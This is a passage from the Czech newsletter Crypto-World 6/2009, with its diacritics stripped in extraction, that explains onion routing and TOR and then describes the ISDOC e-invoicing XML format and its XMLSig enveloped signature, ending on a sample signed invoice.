Obr č 1 Hlavička IP paketu Součaacutestiacute hlavičky těchto paketů je takeacute zdrojovaacute adresa a ciacutelovaacute adresa tedy jednoznačneacute identifikaacutetory původce komunikace a ciacutele komunikace V předchoziacute kapitole však byly popsaacuteny hrozby plynouciacute z možnosti identifikace komunikace Vidiacuteme že tedy již v naacutevrhu komunikačniacuteho protokolu TCPIP je jistyacute probleacutem braacuteniacuteciacute zvyacutešeniacute anonymity v globaacutelniacute siacuteti Existujiacute však řešeniacute kteraacute jsou již v současneacute době použiacutevaacutena a kteraacute mohou tento probleacutem uacutespěšně vyřešit Ziacuteskaacuteme tak protokol pro anonymniacute komunikaci kde z odchycenyacutech dat nepůjdou zjistit jejiacute uacutečastniacuteci Jedniacutem z těchto řešeniacute je onion routing [6] Onion routing

Ciacutelem metody je anonymniacute provoz v IP siacutetiacutech diacuteky tzv onion routerům Technika využiacutevaacute současnou infrastrukturu je tedy ihned použitelnaacute po nainstalovaacuteniacute přiacuteslušneacuteho software Zaacutekladniacutemi prvky jsou klient (Alice) onion routery a server (Bob) ke ktereacutemu Alice požadavek vysiacutelaacute Z odchycenyacutech dat neniacute možneacute vysledovat ani obsah komunikace ani jejiacute uacutečastniacuteky Každyacute prvek kteryacute se komunikace uacutečastniacute (onion router) znaacute pouze předchoziacute

Crypto-World 62009

9

prvek a naacutesledujiacuteciacute v cestě žaacutednyacute jinyacute Pouze posledniacute onion router v řetězci tzv gateway data rozšifruje vyšle požadavek na server Boba v internetu a obdržiacute odpověď Tato odpověď se zase zašifruje a vraciacute se přes onion routery zpět k původci komunikace Situace je znaacutezorněna pomociacute Obr č 2

Obr č 2 Struktura onion routing

Bezpečnost tohoto řešeniacute a anonymita Alice je založena praacutevě na routerech Ty si předaacutevajiacute data mezi sebou a znajiacute praacutevě jen předchůdce a naacutesledovniacuteka Jelikož je cesta přes routery vždy naacutehodně zvolenaacute a unikaacutetniacute neniacute možneacute zjistit Alici Jedinyacute kdo s niacute přiacutemo komunikuje je prvniacute router nicmeacuteně Alice se chovaacute z jeho pohledu jako běžnyacute router kteryacute provoz takeacute jen přeposiacutelaacute a negeneruje tudiacutež ani prvniacute router neznaacute původce dat Celyacute provoz vyslaacuteniacute požadavku od Alice k Bobovi tedy probiacutehaacute naacutesledovně

1 Všechny prvky v siacuteti vlastniacute soukromyacute a veřejnyacute kliacuteč asymetrickeacute kryptografie 2 V prvniacutem kroku si klient zvoliacute routery přes ktereacute půjde provoz Na jejich počtu zaacutevisiacute

bezpečnost a anonymita ndash čiacutem viacutece tiacutem je menšiacute možnost vysledovaacuteniacute Tato cesta musiacute byacutet naacutehodnaacute Klient znaacute veřejneacute kliacuteče těchto routerů

3 Klient zašifruje svůj požadavek dle naacutesledujiacuteciacuteho postupu )))((( požadavekEhlavEhlavEData

CBA VKVKVK ++=

4 Tedy vezme data pro Boba a zašifruje je pomociacute veřejneacuteho kliacuteče posledniacuteho routeru C (gateway) K vyacutesledku pak připojiacute IP hlavičku s adresou routeru C a znovu zašifruje pomociacute VK předchoziacuteho routeru B Tento proces se opakuje až k prvniacutemu routeru A

5 Tyto data pak odešle routeru A a tvaacuteřiacute se jako běžnyacute router tj že data pouze přeposiacutelaacute Router pomociacute sveacuteho soukromeacuteho kliacuteče rozšifruje kryptogram a zjistiacute hlavičku IP paketu v němž je uložena IP dalšiacuteho routeru a kryptogram zašifrovanyacute veřejnyacutem kliacutečem tohoto routeru Odešle tedy tyto data routeru B Takto postupujeme až k posledniacutemu routeru Jak je vidět žaacutednyacute router se nedozviacute viacutece než IP dalšiacuteho routeru (popř předchoziacuteho kteryacute data zaslal) a zašifrovanaacute data

6 Jakmile doraziacute data k posledniacutemu routeru C mohou byacutet rozšifrovaacutena a ziacuteskaacute se tak požadavek Ten je routerem vyslaacuten do internetu a je ziacuteskaacutena odpověď Odpověď je poslaacutena zpět stejnyacutem kanaacutelem Metoda daacutele přidaacutevaacute dalšiacute bezpečnostniacute techniky napřiacuteklad routery vklaacutedajiacuteciacute naacutehodneacute zpožděniacute do komunikace (aby nebylo možneacute sledovat tok dat dle časovaacuteniacute) či vklaacutedajiacuteciacute nesmyslnaacute data

TOR Vyacuteše zmiacuteněnyacute postup je zaacutekladem onion routingu tedy vytvaacuteřiacute se vrstvy do nichž

jsou vždy šifrovaacuteny informace o dalšiacutem bodě Nejznaacutemějšiacute implementaciacute tohoto postupu je TOR což je projekt The Onion Routing [7] Zde je postup jemně odlišnyacute Vytvořiacute se

Crypto-World 62009

10

symetrickeacute kliacuteče pro každyacute autentizovanyacute router pomociacute Diffie-Hellmanova algoritmu [8] a PKI [9] ktereacute se daacutele využiacutevajiacute k šifrovaacuteniacute zpraacutev (z důvodu rychlosti) Alice pak zpraacutevu zašifruje postupně všemi symetrickyacutemi kliacuteči ve stejneacutem duchu jako v předchoziacutem přiacutepadě viz Obr č 3

Obr č 3 Dopřednyacute směr v TOR

Zpraacuteva je pak doručena bezpečně až Bobovi Ten může vytvořit odpověď a poslat ji zpětnou cestou kde každyacute router zpraacutevu zašifruje svyacutem symetrickyacutem kliacutečem přidaacute tedy dalšiacute vrstvu Až doraziacute zpraacuteva k Alici může byacutet rozšifrovaacutena jelikož Alice všechny symetrickeacute kliacuteče znaacute Situace je znaacutezorněna na Obr č 4

Obr č 4 Odpověď v TOR

Obr č 5 TOR ndash přenos zpraacutev

Crypto-World 62009

11

Vyacutesledkem je praktickaacute implementace kteraacute naacutem dovoliacute komunikovat v IP siacutetiacutech zcela

anonymně i přes nutnost použiacutevaacuteniacute IP adres Zjednodušenyacute proces vytvořeniacute kanaacutelu je takeacute na Obr č 5 Zaacutevěr

Hlavniacutem ciacutelem tohoto člaacutenku bylo uvedeniacute důvodů pro zvyacutešeniacute anonymity v prostřediacute globaacutelniacute siacutetě a uvedeniacute řešeniacute ktereacute může sloužit jako počaacutetečniacute bod Byl zde stručně popsaacuten princip tzv onion routingu a nejpoužiacutevanějšiacute implementace TOR Na zaacutekladě těchto naacutestrojů je již možneacute zajistit anonymniacute komunikaci mezi dvěma prvky využiacutevajiacuteciacute IP siacutetě přičemž data budou mezi prvky vyměněna ale pro všechny uacutečastniacuteky zůstane identita klienta skryta Tyto naacutestroje bude daacutele možneacute využiacutet v dalšiacutech metodaacutech vyššiacute vrstvy napřiacuteklad u protokolů majiacuteciacutech zajistit anonymniacute autentizaci Literatura

[1] SCHNEIER Bruce The Tech Lab Bruce Schneier [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpnewsbbccouk1hitechnology7897892stmgt

[2] FactCheck how many CCTV cameras [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwchannel4comnewsarticlessocietyfactcheck+how+many+cctv+cameras2291167gt

[3] SCHNEIER Bruce CCTV doesnt keep us safe yet the cameras are everywhere [online]

2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwguardiancouktechnology2008jun26politicsukcrimegt

[4] SCHNEIER Bruce Our Data Ourselves [online] 2008 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwwiredcomprintpoliticssecuritycommentarysecuritymatters200805securitymatters_0515gt

[5] Onion routing [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpenwikipediaorgwikiOnion_routinggt

[6] Tor anonymity online [online] 2009 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwtorprojectorggt

[7] DIFFIE Whitfield HELLMAN Martin New Directions in Cryptography [online] 1976 [cit 2009-04-26] Dostupnyacute z WWW lthttpwwwcsrutgersedu~tdnguyenclassescs671presentationsArvind-NEWDIRSpdfgt

[8] PKI [online] - [cit 2009-04-26] Dostupnyacute z WWW lthttpcswikipediaorgwikiPKIgt

Crypto-World 62009

12

C Formaacutet elektronickeacute fakturace ISDOC Petr Kuchař ABRA Software as (petrkucharabraeu ) sdruženiacute SPIS (petrkucharspiscz) Preambule S narůstajiacuteciacutem použiacutevaacuteniacutem ICT technologiiacute ve všech oborech lidskeacute činnosti je v posledniacutem obdobiacute pozorovatelnyacute trend většiacuteho použiacutevaacuteniacute elektronickyacutech dokumentů a jejich vyacuteměny mezi subjekty ve smyslu nahrazeniacute klasickyacutech papiacuterovyacutech postupů elektronickyacutemi V tomto duchu jde i legislativa v ČR kteraacute od roku 2000 znaacute elektronickyacute podpis od roku 2005 majiacute elektronickeacute daňoveacute doklady stejnou vaacutehu jako papiacuteroveacute a od 72009 bude možneacute autorizovaně konvertovat papiacuteroveacute dokumenty na elektronickeacute a naopak a takeacute komunikovat se staacutetem či dalšiacutemi subjekty elektronicky prostřednictviacutem tzv Datoveacute schraacutenky Vrcholem trendu elektronizace ve veřejneacute spraacutevě je pak systeacutem zaacutekladniacutech registrů schvaacutelenyacute Poslaneckou sněmovnou 1322009 kteryacute posune eGovernment v Českeacute republice po mnoha letech na zcela novou informatickou uacuteroveň Vedle přiacutekladů z veřejneacute spraacutevy je stejnyacute trend pozorovatelnyacute i ve sfeacuteře korporaacutetniacute Jedniacutem z milniacuteků je vybudovaacuteniacute formaacutetu elektronickeacute fakturace s naacutezvem ISDOC Tento formaacutet byl vystavěn Pracovniacute skupinou pro elektronickou fakturaci sdruženiacute SPIS a maacute šanci staacutet se de facto standardem elektronickeacute fakturace v ČR V řiacutejnu 2008 se 14 vyacuteznamnyacutech firem z oboru ICT rozhodlo k podpisu bdquoDeklarace o společneacutem postupu v oblasti elektronickeacute fakturaceldquo kterou se tyto subjekty zavaacutezaly formaacutet implementovat do svyacutech fakturačniacutech produktů v obdobiacute jednoho roku od jeho vyhlaacutešeniacute ke ktereacutemu došlo 1932009 Naacutesledujiacuteciacute přiacutespěvek se věnuje vysvětleniacute důvodů jeho existence technologickyacutech vyacutechodisek použityacutech při jeho naacutevrhu včetně řešeniacute problematiky elektronickeacuteho podpisu a takeacute jednomu z naacutestrojů pro jeho hromadneacute nasazeniacute

Co je formaacutet ISDOC Formaacutet ISDOC je formaacutet elektronickeacute fakturace definovanyacute jako XML soubor a popsanyacute XSD scheacutematem Součaacutestiacute formaacutetu je i zaručenyacute elektronickyacute podpis založenyacute na kvalifikovaneacutem certifikaacutetu čiacutemž se takovyacute dokument staacutevaacute daňovyacutem dokladem vystavenyacutem v elektronickeacute formě podle sect 26 odst4 zaacutekona č2352004 o dani z přidaneacute hodnoty

Hlavniacute myšlenkou formaacutetu ISDOC je umožnit korporaacutetniacutemu i veřejneacutemu sektoru posiacutelaacuteniacute datovyacutech zpraacutev jejichž interniacute formaacutet bude v souladu s našiacute legislativou bude podporovaacuten vyacuteznamnyacutemi vyacuterobci fakturačniacuteho software v ČR a hlavně bude jednotnyacute Změniacute tak leacuteta trvajiacuteciacute žalostnyacute stav informačniacute praxe v našiacute zemi kdy ač technologie i legislativa elektronickou fakturaci dovolovala se tato diacuteky existenci mnoha proprietaacuterniacutech formaacutetů různyacutech vyacuterobců nedala použiacutet v globaacutelniacutem měřiacutetku Tak v roce 2006 vznikla z iniciativy ABRA Software as ve sdruženiacute SPIS pracovniacute skupina kteraacute navaacutezala na legislativniacute rešerše svyacutech předchůdců z roku 2003 a začala hledat konkreacutetniacute legislativniacute i technologickou cestu Zaklaacutedajiacuteciacute členoveacute skupiny ABRA Software LCS International a Ernst amp Young se zaacutehy rozrostli o dalšiacute firmy jako jsou Ciacutegler Software K2Atmitec Stormware DC Concept JKR nebo Českaacute spořitelna Pozornyacute čtenaacuteř již jistě postřehl že jde většinou o konkurenty na trhu informačniacutech a ERP systeacutemů Ano je tomu tak nicmeacuteně myšlenka jednotneacuteho formaacutetu je natolik silnaacute že i firmy v přiacutemeacutem konkurenčniacutem postaveniacute jsou schopny si sednout k jednomu stolu a spolupracovat na společneacutem diacutele Kliacutečovou uacutelohu v tomto ohledu sehraacutelo Sdruženiacute pro informačniacute společnost (SPIS)

Crypto-World 62009

13

Proč ISDOC vznikl a jakyacute je jeho ciacutel Bliacutezkyacutem ciacutelem vzniku formaacutetu bylo sjednotit elektronickou podobu několika ekonomickyacutech dokumentů fakturačniacute povahy (faktura dobropis vrubopis zaacutelohovaacute faktura daňovyacute zaacutelohovyacute list a jeho dobropis) a daacutet jiacute prostřednictviacutem spolupraacutece a podpory vyacuteznamnyacutech vyacuterobců na trhu k dispozici jejich klientům - firmaacutem ktereacute se zabyacutevajiacute obchodem či službami a ktereacute z nejrůznějšiacutech důvodů neimplementovaly žaacutedneacute jineacute obecneacute řešeniacute Vzdaacutelenyacutem ciacutelem pak je dosaacutehnout tiacutemto způsobem zvyacutešeniacute produktivity praacutece v segmentu vyacuteroby a distribuce zbožiacute i v segmentu služeb což v dlouhodobeacutem horizontu pomůže Českeacute republice jako celku se prosadit v evropskeacutem kontextu jako země s velkyacutem podiacutelem služeb s vysokou přidanou hodnotou Tiacutem aktivita ISDOC plniacute i jedno ze zaacutekladniacutech poslaacuteniacute sdruženiacute SPIS

Hlavniacute vyacutehody ISDOC Nevyžaduje pro komunikaci žaacutedneacuteho zprostředkovatele

Jedna z hlavniacutech vyacutehod tohoto formaacutetu XML soubor obsahuje elektronickyacute podpis a je tudiacutež plnohodnotnyacutem daňovyacutem dokladem V tomto smyslu neniacute podstatneacute jakaacute přenosovaacute infrastruktura je použita a jak došlo k doručeniacute dokladu od vystavitele k přiacutejemci Je možneacute tyto soubory posiacutelat jako přiacutelohu v běžneacutem e-mailu je možneacute použiacutevat zabezpečenyacute přenos pomociacute VPN či dalšiacutech řešeniacute (jako např bdquoNESS Trade Connectorldquo což je zabezpečenyacute přenos na uacuterovni B2B) nebo je možneacute soubory dopravovat na fyzickyacutech meacutediiacutech typu Flash či dokonce FD Důsledkem teacuteto vyacutehody je samozřejmě uacutespora transakčniacutech naacutekladů ktereacute např malyacutem firmaacutem doposud braacutenily takoveacute řešeniacute nasadit Tato vlastnost byla jedniacutem ze zaacutekladniacutech požadavků celeacuteho zadaacuteniacute formaacutetu ISDOC

Připouštiacute možnost zprostředkovatele komunikace

I když si tento bod možnaacute zdaacutenlivě odporuje s bodem předchoziacutem je takeacute důležityacute Formaacutet totiž připouštiacute i možnost třetiacute strany - zprostředkovatele komunikace mezi vyacutestavcem a přiacutejemcem kterou podporuje zvlaacuteštniacutemi bdquoroutovaciacutemildquo položkami Třetiacute strana do původně bilateraacutelniacuteho vztahu přinaacutešiacute zpravidla nějakou dalšiacute přidanou hodnotu za kterou jsou původniacute strany ochotny zaplatit Jedna z nejzajiacutemavějšiacutech je vyřešeniacute bezpečnostniacute problematiky jednotlivyacutech dokladů tak aby je cestou nemohl nikdo monitorovat daacutele to byacutevaacute notifikace přijetiacute dokladu zprostředkovatelem i přiacutejemcem vyřešeniacute souhlasu s přiacutejmem elektronickyacutech dokladů pomociacute všeobecnyacutech podmiacutenek zprostředkovatele a v neposledniacute řadě takeacute častaacute služba spočiacutevajiacuteciacute v archivaci jednotlivyacutech dokladů po zaacutekonnou dobu 10+1 let Přiacutekladem takoveacuteho řešeniacute může byacutet např Českaacute Spořitelna se svou službou FAKTURA 24 či již vyacuteše zmiacuteněnyacute systeacutem Datovyacutech schraacutenek kteryacute nabiacutedne oproti jinyacutem zaacutekonnou fikci doručeniacute dokumentu ve lhůtě 10 dnů Důsledkem možnosti využiacutet služeb intermediaacutetora nad formaacutetem ISDOC je možnost použitiacute stejneacuteho formaacutetu i pro relativně velkeacute subjekty jako jsou napřiacuteklad dodavateleacute ze segmentu utilit (tj energie vodaacuterenstviacute atd)

Formaacutet je pouze jeden

Pro pochopeniacute vyacuteznamu tohoto bodu je užitečneacute se podiacutevat do světa EDI (myšleno UN EDIFACT) což je dalšiacute formaacutet kteryacute naacuteš zaacutekon o DPH pro elektronickeacute daňoveacute doklady připouštiacute Definuje jej odkazem na bdquoDoporučeniacute komise 1994820ES ze dne 19řiacutejna 1994ldquo Zde je situace takovaacute že jednotliviacute dodavateleacute EDI řešeniacute často oborově zaměřeniacute si mohou z mnoha standardniacutech položek formaacutetu vybrat pro sveacute použitiacute pouze některeacute a na těch vystavět svůj tzv subset Vyacutesledkem je že firma kteraacute maacute ve sveacutem ISERP implemenovaacuten subset A přiacutemo nemůže komunikovat s firmou majiacuteciacute implementovaacuten subset B Musiacute z principu využiacutet služeb třetiacute strany kteraacute umiacute převeacutest protokoly jednotlivyacutech subsetů mezi

Crypto-World 62009

14

sebou což typicky byacutevaacute placenaacute služba Naproti tomu u formaacutetu ISDOC nic takoveacuteho neniacute třeba protože formaacutet je prostě jen jeden Samozřejmě je třeba se popasovat s probleacutemem oborovyacutech specifik kteryacute je v ISDOC vyřešen pomociacute hlavičkovyacutech a řaacutedkovyacutech uživatelskyacutech položek To jsou elementy v jejichž raacutemci může byacutet umiacutestěna libovolnaacute uživatelskaacute XML struktura kteraacute na rozdiacutel od zbytku formaacutetu nepodleacutehaacute kontrole pomociacute XSD scheacutematu a tudiacutež neniacute třeba s každou takovou uživatelskou variantou měnit zaacutekladniacute XSD scheacutema

Obecně je možneacute řiacuteci že Pracovniacute skupina pracovala celyacutech 14 měsiacuteců na tom aby formaacutet zohlednil všechna důležitaacute specifika českeacute daňoveacute legislativy Našiacutem ciacutelem bylo aby formaacutet byl schopen nahradit 95 faktur ktereacute se doposud vyskytovaly v papiacuterovyacutech firemniacutech transakciacutech Důsledkem vyacuteše zmiacuteněnyacutech vlastnostiacute pak je že pokud libovolnaacute firma použiacutevaacute fakturačniacute software podporujiacuteciacute formaacutet ISDOC a elektronicky fakturuje tak libovolneacute jineacute firmy podporujiacuteciacute takteacutež formaacutet ISDOC mohou tyto faktury přijiacutemat a jejich systeacutem je umiacute interpretovat A pokud přijiacutemaciacute systeacutem objeviacute uživatelskeacute položky kteryacutem rozumiacute tak je použije pokud ne tak je ignoruje V každeacutem přiacutepadě je ale faktura načtena jak položkově tak finančně Aby pravděpodobnost spraacutevneacute interpretace byla co nejvyššiacute iniciovalo sdruženiacute SPIS již jmenovanou ldquoDeklaraci o společneacutem postupu v oblasti elektronickeacute fakturacerdquo na ktereacute se kromě již zmiacuteněnyacutech firem shodli i dalšiacute vyacuteznamneacute firmy z oboru ISERP jako jsou Karat Software Gordic Asseco ČR či dokonce zaacutestupci nadnaacuterodniacutech gigantů jako Microsoft nebo SAP ČR Po vyhlaacutešeniacute formaacutetu v březnu 2009 se k Deklaraci začaly připojovat dalšiacute firmy K 162009 je jejich vyacutečet naacutesledujiacuteciacute Accord ALTEC ALTUS software COMPEKON MICRODATA ORTEX TILL CONSULT TRIADA VERA a WinStrom

Z čeho jsme vychaacutezeli Formaacutet ISDOC vychaacuteziacute filozoficky z formaacutetu UBL 20 definovaneacuteho mezinaacuterodniacutem sdruženiacutem OASIS (wwwoasis-openorg) Z teacuteto normy jsme původně vyšli a chviacuteli se zdaacutelo že budeme moci jen popsat co ktereacute položky znamenajiacute a můžeme začiacutet implementovat do svyacutech systeacutemů Časem se ale začaly objevovat probleacutemy jak naplnit ten či onen legislativniacute požadavek a v určitou chviacuteli bylo jasneacute že budeme muset pro některeacute funkčnosti použiacutet vlastniacute položky protože UBL nic podobneacuteho neřešiacute (napřiacuteklad problematika daňovyacutech zaacuteloh počiacutetaacuteniacute DPH metodou zdola nebo shora atd) Tak se v naacutevrhu objevil kromě čtyř původniacutech jmennyacutech prostorů i jeden novyacute ndash bdquoisdldquo ve ktereacutem jsme koncentrovali veškereacute noveacute či pozměněneacute položky Když jsme začali daacutevat dohromady jednotlivaacute XML scheacutemata (soubory XSD) tak se velmi rychle ukaacutezalo že vyacuteslednyacute popis i formaacutet je složityacute a nepřehlednyacute A tak jsme nakonec definovali jedinyacute jmennyacute prostor kteryacute cca z 12 vychaacuteziacute z položek a datovyacutech typů UBL a ze druheacute poloviny je doplněn položkami vlastniacutemi Všechny položky majiacute samozřejmě anglickeacute naacutezvy a kde to bylo možneacute použili jsme datovyacute typ shodnyacute s UBL 20

Hlavniacute rysy technickeacuteho řešeniacute Viacutece druhů dokladů faktura čniacute povahy

Jak již bylo zmiacuteněno formaacutet ISDOC řešiacute všechny zaacutekladniacute dokumenty fakturačniacute povahy ktereacute se mohou vyskytovat v běžneacute firemniacute praxi Jednaacute se konkreacutetně o fakturu vč podpory zuacutečtovaacuteniacute daňovyacutech i přiacutepadnyacutech nedaňovyacutech zaacutelohovyacutech listů dobropis vrubopis zaacutelohovou fakturu (myšleno nedaňovyacute zaacutelohovyacute list) daňovyacute zaacutelohovyacute list a dobropis daňoveacuteho zaacutelohoveacuteho listu

Crypto-World 62009

15

Doklady v miacutestniacute i ciziacute měně

Všechny doklady mohou byacutet buď v miacutestniacute nebo v jedneacute ciziacute měně Tuto omezujiacuteciacute podmiacutenku jsme stanovili po analyacuteze vyacuteskytu cizoměnnyacutech dokladů s viacutece než jednou měnou Podle našich zjištěniacute je takovyacutech dokladů jen velmi maleacute množstviacute Z tohoto důvodu a současně takeacute z důvodu neuacuteměrneacuteho zkomplikovaacuteniacute vnitřniacutech vazeb jsme rozhodli se touto variantou nadaacutele nezabyacutevat Identifikace až 5-ti různyacutech stran na dokladu

Protože na dokladech se běžně vyskytujiacute kromě adres odběratele a dodavatele zapsanyacutech v obchodniacutem rejstřiacuteku ještě adresy dalšiacute např adresy fakturačniacutech miacutest či adresy dodaacuteniacute podporuje ISDOC až 5 takovyacutech Důležiteacute je to i proto že zaacutekon dovoluje pověřit fakturaciacute třetiacute osobu Důležiteacute je že rozlišovaciacute položky pro identifikaci firem dovolujiacute použitiacute jak firemniacutech (proprietaacuterniacutech) koacutedů tak celosvětovyacutech GLN (Global Location Number) identifikaacutetorů a samozřejmě takeacute naacuterodniacutech identifikačniacutech čiacutesel kteryacutem je v ČR uacutedaj IČ

Identifikace zbožiacute až 5-ti rozlišujiacuteciacutemi uacutedaji

Podobně jako v přiacutepadě firem je u rozlišeniacute zbožiacute podporovaacuteno hned několik druhů identifikaacutetorů Jsou to až 3 různeacute koacutedy podle dodavatele daacutele globaacutelniacute identifikaacutetor typu EAN a pro spolupraacutece typu bdquomalyacute dodavatel a obrovskyacute odběratelldquo i koacutedy zbožiacute podle odběratele

Podpora seacuteriovyacutech čiacutesel a šaržiacute vč expiraciacute

Protože předmětem obchodu a tedy i fakturace je často zbožiacute u ktereacuteho je třeba evidovat jednotlivaacute seacuteriovaacute čiacutesla (typicky velkaacute elektronika) nebo seacuterie zbožiacute se stejnou šaržiacute (typicky leacuteky či potraviny) obsahuje ISDOC přiacuteslušneacute kolekce i na tyto eventuality

Možnost použitiacute tzv uživatelskyacutech položek

Technicky se jednaacute o zvlaacuteštniacute nevalidovaneacute kolekce hlavičkovyacutech a řaacutedkovyacutech položek ktereacute nejsou zaacuteměrně nijak svaacutezaacuteny s hlavniacutem XSD scheacutematem Tiacutem je možno ve standardizovaneacutem formaacutetu použiacutevat i položky na kteryacutech se vyacutestavce a přiacutejemce dohodli bilateraacutelně Napřiacuteklad bude-li nutno na fakturačniacutem řaacutedku se spotřebou elektrickeacute energie v KWh přeneacutest ještě doplňkovou informaci v jakyacutech sazbaacutech se čerpaacuteniacute uskutečnilo jakyacute byl paušaacutelniacute poplatek za konkreacutetniacute elektroměr a nakolik zaacutekaniacutek využil možnost vyacutekupu zeleneacute energie tak je to touto cestou možneacute aniž je nutno měnit celkovou verzi formaacutetu a na všech stranaacutech jiacute implementovat V praxi tak informačniacute systeacutemy vyacutestavce a přiacutejemce mohou byacutet upraveny k použiacutevaacuteniacute těchto položek zatiacutemco ostatniacute systeacutemy tyto položky nebudou interpretovat protože tyto nejsou popsaacuteny ve validačniacutech scheacutematech Položky povinneacute pro daňovyacute doklad však obsahuje každyacute soubor ISDOC

Řešeniacute přiacuteloh jako dokumentů majiacuteciacutech praacutevniacute relevanci k faktuře

Protože v papiacuteroveacute praxi se často vyskytujiacute u faktur takeacute přiacutelohy ktereacute mohou miacutet i praacutevniacute relevanci k mateřskeacutemu dokladu museli jsme za viděniacute ciacutele nahradit papiacuteroveacute řešeniacute elektronickyacutem řešit i tyto situace Přiacutelohy mohou obsahovat napřiacuteklad všeobecneacute obchodniacute podmiacutenky přiacutelohou může byacutet kalkulačniacute list k faktuře na parkety stejně jako fotografie billboardu k faktuře na reklamniacute služby Řešeniacute se v zaacutesadě děliacute na ty ktereacute musiacute omezit velikost přiacuteloh a na ty ostatniacute kde to nutneacute neniacute K omezeniacute velikosti přiacuteloh se přistupuje v přiacutepadě kdy přiacutelohy jsou součaacutestiacute samotneacuteho XML (v přiacuteslušneacutem koacutedovaacuteniacute např BASE64) a jejich nadměrnaacute velikost by tak mohla zcela ochromit zachaacutezeniacute s přiacuteslušnyacutem souborem (funce načteniacute do paměti verifikace proti XSD atd) Proto jsme se v definici ISDOC vydali druhou cestou kterou je udržovaacuteniacute přiacuteloh mimo vlastniacute XML soubor ndash v jineacutem datoveacutem

Crypto-World 62009

16

kontejneru Formaacutet ISDOC jsou tedy ve skutečnosti formaacutety dva Jeden je soubor isdoc což je vnitřně bdquoklasickyacuteldquo XML soubor kteryacute neobsahuje žaacutedneacute přiacutelohy a použije se praacutevě v tomto přiacutepadě Druhyacutem formaacutetem je soubor isdocx kteryacute je vnitřně souborem typu ZIP a kteryacute může kromě bdquohlavniacuteholdquo souboru isdoc neacutest i libovolneacute dalšiacute soubory jako přiacutelohy daneacuteho dokladu Vtip je v tom že jednotliveacute přiacutelohy jsou referencovaacuteny v přiacuteslušneacute kolekci bdquohlavniacuteholdquo isdoc souboru svyacutem jmeacutenem a SHA1 otiskem A jak již bylo uvedeno celyacute obsah dokladu isdoc je podepsaacuten elpodpisem Tiacutem jsou soubory přiacuteloh sice technicky umiacutestěny vně XML (a nezdržujiacute jeho zpracovaacuteniacute) ale současně se jakaacutekoliv manipulace s přiacutelohami okamžitě projeviacute porušeniacutem SHA1 otisků jednotlivyacutech přiacuteloh přiacutepadně rovnou neplatnostiacute elektronickeacuteho podpisu celeacute faktury pokud by se někdo pokoušel v niacute SHA1 otisky přiacuteloh ručně přepsat Tiacutem by byl soubor isdoc prohlaacutešen za neautentickyacute (pozměněnyacute) Vyacutesledneacute řešeniacute tedy splňuje splňuje stejnaacute bezpečnostniacute kriteacuteria jako kdyby přiacutelohy byly celeacute součaacutestiacute jedineacuteho podepsaneacuteho XML

Vlastniacute implementace elektronickeacuteho podpisu Po provedeniacute rešerše technik podepisovaacuteniacute jsme pro přiacutepad podepisovaacuteniacute XML souboru isdoc zvolili normu XMLSig metodu Enveloped Jejiacutem principem je že těsně před ukončeniacutem rootoveacuteho elementu kteryacutem je v našem přiacutepadě element ltInvoicegt se vložiacute element ltSignaturegt ve ktereacutem se celyacute podpis odehraacutevaacute Uvnitř tohoto elementu jsou pak tři dalšiacute ltSignedInfogtltSignatureValuegtltKeyInfogt Element ltSignedInfogt obsahuje kromě popisu algoritmů digitaacutelniacuteho otisku algoritmů kanonikalizace a elektronickeacuteho podpisu hlavně vlastniacute digitaacutelniacute otisk celeacuteho XML dokumentu a to v elementu ltDigestValuegt Kanonikalizace je metoda kteraacute uvnitř struktury XML vyřadiacute přebytečneacute mezery viacutecenaacutesobneacute konce řaacutedků a dalšiacute neproduktivniacute znaky Pozor ale tato metoda nijak nemanipuluje s vlastniacutemi daty jednotlivyacutech elementů ktereacute i po kanonikalizaci zůstaacutevajiacute v původniacutem tvaru řešiacute pouze znaky ve struktuře XML Napřiacuteklad tedy pokud atribut nějakeacuteho elmentu je zbytečně posunut vpravo a podobně Po kanonikalizaci je proveden otisk přiacuteslušnyacutem algoritmem a pak je již programem složen celyacute element ltSignedInfogt Na tento element je naacutesledně aplikovaacuten elektronickyacute podpis zvolenou metodou v drtiveacute většině se použiacutevaacute algoritmus RSA a vyacutesledek je uložen do elementu ltSignatureValuegt Aby přiacutejemce měl vždy po ruce veřejnyacute kliacuteč podepisujiacuteciacute osoby je jako třetiacute element přidaacutena binaacuterniacute reprezentace jeho certifikaacutetu a to do jednoho z podelementů elementu ltKeyInfogt

Poznaacutemka od 112010 je podle světovyacutech doporučeniacute zapovězeno v systeacutemech veřejneacute spraacutevy v ČR použiacutevaacuteniacute digitaacutelniacutech otisků algoritmem SHA1 a je nutno přejiacutet na některyacute vyššiacute algoritmus z rodiny SHA2 napřiacuteklad SHA256 Pracovniacute skupina SPIS na tomto probleacutemu aktuaacutelně pracuje

Konkreacutetniacute provedeniacute podpisu v XML souboru faktury by mohlo po určiteacutem zjednodušeniacute a naformaacutetovaacuteniacute vypadat např takto

ltxml version=10 encoding=utf-8gt ltInvoice xmlns=httpisdoccznamespaceinvoice version=51gt lt--helliphelliphelliphelliphelliphellip--gt ltmdashpoložky dokumentu faktura--gt lt--helliphelliphelliphelliphelliphellip--gt ltPaymentMeansgt ltmdashposledni element nepodepsane faktury- --gt ltPaymentMeansgt

Crypto-World 62009

17

ltSignature xmlns=httpwwww3org200009xmldsi ggt ltSignedInfogt

ltCanonicalizationMethod Algorithm=httpwwww3or gTR2001REC-xml- c14n-20010315gt ltSignatureMethod Algorithm=httpwwww3org2000 09xmldsigrsa- sha1gt

ltReference URI=gt ltTransformsgt

ltTransform Algorithm=httpwwww3org200009xml dsigenveloped-signaturegt

ltTransformsgt ltDigestMethod Algorithm=httpwwww3org2000 09xmldsigsha1gt ltDigestValuegt29hg161shG5T0cuwyUEQZiHmn4=ltDiges tValuegt ltReferencegt ltSignedInfogt ltSignatureValuegtrJgOKTSyaGb5 atd==ltSignatureVa luegt ltKeyInfogt ltX509Datagt ltX509CertificategtMIIEVCCAz+gAKoZIhvcNAQAwaDELmak GA1UEBhMCQ1ox hellip vlastni klientskyacute certifikaacutet hellip qoF4Y1IgJ0w16ws= ltX509Certificategt ltX509Datagt ltKeyInfogt ltSignaturegt ltInvoicegt

